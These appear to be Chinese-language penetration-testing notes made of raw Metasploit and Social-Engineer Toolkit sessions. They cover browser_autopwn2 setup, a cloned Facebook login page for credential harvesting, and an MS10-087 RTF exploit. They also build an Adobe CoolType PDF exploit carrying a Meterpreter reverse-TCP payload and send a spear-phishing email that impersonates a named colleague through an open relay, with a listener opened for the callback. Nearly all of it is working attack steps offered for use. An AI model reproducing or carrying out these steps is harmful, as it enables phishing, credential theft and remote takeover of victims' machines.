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浏览器攻击 browser_autpwn2 (BAP2)

 mkdir /test  为接受响应的服务器创建目录 
  use auxiliary/server/browser_autopwn2
  set URIPATH /test
   #假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
    set EXCLUDE_PATTERN android|adobe_flash   
    show advanced    查看高级选项的完整列表
    set ShowExploitList true
    set VERBOSE true


root@bt:# service apache2 start
root@bt:# setoolkit

Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner

IP address for the POST back in Harvester/Tabnabbing: 填写本机IP

set:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面)





msf > db_status  postgresql selected, no connectionmsf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.ymlmsf > search officemsf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bofmsf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/execmsf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exemsf exploit(ms10_087_rtf_pfragments_bof) > exploit [+] msf.rtf stored at /root/.msf4/local/msf.rtf

root@kali:~# cd /root/.msf4/local 生成的msf.rtf



set> 1   Social-Engineering Attacksset> 1   Spear-Phishing Attack Vectorsset:phishing>1       Perform a Mass Email Attackset:payloads>6    Adobe CoolType SING Table "uniqueName" Overflowset:payloads>2    Windows Meterpreter Reverse_TCPset:payloads> Port to connect back on [443]:All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directoryDo you want to rename the file?example Enter the new filename: moo.pdf1. Keep the filename, I dont care.2. Rename the file, I want to be cool.=ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E

然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。

把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上(关闭防病毒软件),打开template.pdf,修改后拷贝回原目录下,覆盖原有的template.pdf

set:phishing>2set:phishing> New filename:Dvssc_ABC_Project_Statue.pdfset:phishing>1 E-Mail Attack Single Email Addressset:phishing>2    One-Time Use Email Templateset:phishing> Subject of the email:ABC Project Statusset:phishing> Send the message as html or plain? h or p [p]:pset:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Next line of the body: Hi Wang:Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice. Next line of the body: Next line of the body: Best Regard!Next line of the body: li Ming Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.comset:phishing>2 Use your own server or open relayset:phishing> From address (ex: moo@example.com):liming@dvssc.comset:phishing> Username for open-relay [blank]:yournamePassword for open-relay [blank]: set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.comset:phishing> Port number for the SMTP server [25]:set:phishing> Flag this message/s as high priority? [yes|no]:yes[*] SET has finished delivering the emailsset:phishing> Setup a listener [yes|no]:yes

